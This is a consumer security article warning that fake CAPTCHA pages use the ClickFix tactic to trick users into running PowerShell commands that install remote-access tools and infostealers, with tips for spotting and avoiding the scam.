Beware of Fake CAPTCHAs That Distribute Malware
CAPTCHA — short for “Completely Automated Public Turing test to tell Computers and Humans Apart” — is a form of online verification that helps distinguish human users from bots on e-commerce login, account registration, and checkout pages. If you can correctly identify a series of distorted letters or all of the photos that include objects like stop signs to prove you’re not a robot, you’re allowed to interact with the site or app.
But just because CAPTCHAs and reCAPTCHAs are ubiquitous doesn’t mean they’re always harmless. Internet users have become accustomed to interacting with CAPTCHAs without thinking, so naturally cybercriminals have found ways to spoof them to spread malware.
How Fake CAPTCHA Sites Spread Malware
CAPTCHA scams use a social engineering tactic known as ClickFix to trick users into downloading and installing malware that gains remote access, logs keystrokes, or steals data from your device. When you interact with a fake CAPTCHA, you allow the malicious website to copy a command to your clipboard and deliver the payload in the process.
As Malwarebytes Labs describes , these CAPTCHA attacks are often initiated when users try to access popular content like movies, music, or news, although malicious links can also be distributed through phishing emails or malvertising. A CAPTCHA pop-up window appears asking you to confirm that you are not a robot, after which you are redirected to another CAPTCHA screen with verification steps that involve a series of keystrokes. If you follow the instructions, you will execute a PowerShell script that downloads and installs the malware.
I’ve seen several variations of this scheme: In one case, attackers spoofed Booking.com to install a Remote Access Tool (RAT) backdoor, giving them remote control of victims’ machines. In another, repurposed Discord invite links were used to deliver infostealers and keyloggers that compromised users’ credentials. ClickFix also appeared in AI-generated TikTok videos, containing verbal instructions on how to activate the software’s features.
While many ClickFix attacks have targeted Windows users, researchers recently discovered a variant that uses a fake CAPTCHA to install the Atomic macOS Stealer on Apple devices.
How to Prevent CAPTCHA Scams
While many CAPTCHA and reCAPTCHA requests are legitimate, anything that involves instructions — pressing a key combination or running the Run command on your device — is definitely not. Strong CAPTCHAs won’t direct you to download software or extensions.
Be wary of CAPTCHA forms from sources and sites you don’t know or trust, and never follow the instructions in these pop-ups without thinking. Attackers exploit “verification fatigue,” where users click so quickly on something as mundane as a CAPTCHA that they don’t notice the red flags.
Malwarebytes Labs also recommends disabling JavaScript in your browser , which will prevent malicious websites from accessing your clipboard. While this is useful for improving your online security and privacy, it will also break some features on the websites you visit, rendering them essentially useless. You can only do this when browsing pages you don’t know or trust.